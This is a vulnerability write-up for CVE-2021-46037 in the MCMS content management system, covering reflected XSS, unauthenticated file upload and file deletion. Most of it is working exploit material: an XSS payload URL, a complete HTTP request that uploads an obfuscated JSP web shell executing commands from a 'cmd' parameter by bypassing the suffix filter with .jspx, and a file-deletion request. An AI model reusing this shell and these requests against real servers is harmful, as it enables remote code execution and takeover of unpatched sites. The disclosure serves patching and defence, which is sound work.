Headline
CVE-2021-46037: MCMS vulnerabilities
MCMS v5.2.4 was discovered to contain an arbitrary file deletion vulnerability via the component /template/unzip.do.
An open source CMS Project,https://github.com/ming-soft/MCMS
the MCMS vulnerabilities include
- Reflect XSS
- Unauthorized file upload
- Authorized file delete
Reproduce****XSS
path /ms/template/unzip.do exist reflect xss
payload
1
/ms/template/unZip.do?fileUrl=%3C/p%3E%3Cimg%20src=x%20onerror=alert(%27hacking%27)%3E
Authorized file uploads exist
path /ms/file/uploadTemplate.do
need login get Cookie and upload file
Unauthorized file upload to RCE
path /file/upload
as above picture ,hacker can upload .jspx file to server without any identity verification , and even when project packaged war deploy in tomcat can get web shell from server.
the system filter suffix
.jspbut still can use.jspxto bypass
payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
POST /file/upload.do HTTP/1.1
Host: 192.168.100.103:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124088951720288539841514905041
Content-Length: 1393
Origin: http://192.168.100.103:8080
Connection: keep-alive
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="uploadPath"
/
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="isRename"
false
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="appId"
false
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="file"; filename="shell.jspx"
Content-Type: image/png
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter(“cmd”)!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer(“amF2YS5sYW5nLlJ1bnRpbWU=”)));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer(“ZXhlYw==”)), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer(“Z2V0UnVudGltZQ==”))).invoke(null, new
Object[]{}), request.getParameter(“cmd”) );
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print(“<pre>”);
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print(“</pre>”);
}
%>
-----------------------------124088951720288539841514905041–
source
net/mingsoft/basic/action/ManageFileAction.java
Authorized file delete
net/mingsoft/basic/action/TemplateAction.java
payload
1
2
3
4
5
6
7
8
9
10
11
12
GET /ms/template/unZip.do?fileUrl=HACKED HTTP/1.1
Host: 192.168.100.103:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://192.168.100.103:8080/ms/template/index.do?
Cookie: JSESSIONID=56EC9CCC14E1E8DEE4AACCF732EA7FC7; pageno_cookie=1